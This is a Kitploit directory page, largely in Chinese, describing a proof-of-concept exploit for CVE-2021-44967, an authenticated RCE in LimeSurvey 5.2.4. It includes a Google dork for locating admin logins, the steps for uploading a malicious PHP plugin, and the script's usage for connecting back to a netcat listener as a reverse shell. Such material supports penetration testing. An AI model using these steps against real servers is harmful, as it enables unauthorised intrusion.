Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2021-44967 — 针对 CVE-2021-44967 的 POC 漏洞利用 | Kitploit
工具/GitHubGitHub/d3ext/cve-2021-44967
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试远程访问工具
GitHubd3ext/cve-2021-44967

CVE-2021-44967

针对 CVE-2021-44967 的 POC 漏洞利用

查看仓库
611年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2021-44967

root@kitploit:~
# Exploit Title: LimeSurvey 5.2.4 - Authenticated Remote Code Execution (RCE)
# Google Dork: inurl:limesurvey/index.php/admin/authentication/sa/login
# Date: 05/12/2021
# Discovered by: Y1LD1R1M
# Exploit Author: D3Ext
# Vendor Homepage: https://www.limesurvey.org/
# Software Link: https://download.limesurvey.org/latest-stable-release/limesurvey5.2.4+211129.zip
# Version: 5.2.x
# Tested on: Kali Linux 2025
# CVE: CVE-2021-44967

漏洞说明

LimeSurvey 5.2.4 的上传并安装插件功能中存在一个远程代码执行(RCE)漏洞,远程恶意用户可利用该漏洞上传任意 PHP 代码文件。

以下是手动利用此漏洞所需遵循的步骤:

  1. 创建一个包含 PHP 文件和配置文件的 ZIP 压缩包
  2. 登录 LimeSurvey
  3. 进入"配置 -> 插件 -> 上传并安装"
  4. 上传你的 ZIP 文件
  5. 安装它
  6. 最后,激活你的插件
  7. 然后,你的 PHP 代码应可通过 /upload/plugins/<plugin_name>/<php_file> 访问

用法

root@kitploit:~
usage: CVE-2021-44967.py [-h] --url URL --user USER --password PASSWORD --lhost LHOST --lport LPORT [--verbose]

CVE-2021-44967 - LimeSurvey Authenticated RCE

options:
  -h, --help           show this help message and exit
  --url URL            URL of the LimeSurvey web root
  --user USER          username to log in
  --password PASSWORD  password of the username
  --lhost LHOST        local host to receive the reverse shell
  --lport LPORT        local port to receive the reverse shell
  --verbose            enable verbose

先启动一个 netcat 监听器,然后像这样执行漏洞利用脚本:

root@kitploit:~
python3 --url <URL> --user <username> --password <password> --lhost <local host> --lport <local port>

演示

参考链接

root@kitploit:~
https://github.com/Y1LD1R1M-1337/Limesurvey-RCE
https://www.exploit-db.com/exploits/50573
https://github.com/p0dalirius/LimeSurvey-webshell-plugin
https://ine.com/blog/cve-2021-44967-limesurvey-rce
https://pentest-tools.com/vulnerabilities-exploits/limesurvey-524-rce-vulnerability_13029

许可证

本项目采用 MIT 许可证

版权所有 © 2025,D3Ext

下载工具